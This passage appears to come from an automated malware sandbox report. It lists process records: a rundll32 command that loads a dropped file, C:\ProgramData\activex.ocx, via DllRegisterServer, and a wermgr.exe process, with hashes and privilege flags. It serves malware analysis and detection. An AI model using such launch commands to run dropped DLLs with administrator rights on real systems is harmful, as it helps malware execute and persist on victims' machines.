              Commandline:rundll32 C:\ProgramData\activex.ocx, DllRegisterServer
              Imagebase:0x900000
              File size:44544 bytes
              MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:moderate

              General

              Start time:13:00:52
              Start date:05/01/2021
              Path:C:\Windows\System32\wermgr.exe
              Wow64 process (32bit):
              Commandline:C:\Windows\system32\wermgr.exe
              Imagebase:
              File size:50688 bytes
              MD5 hash:41DF7355A5A907E2C1D7804EC028965D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:moderate

              Disassembly

              Code Analysis

              Reset < >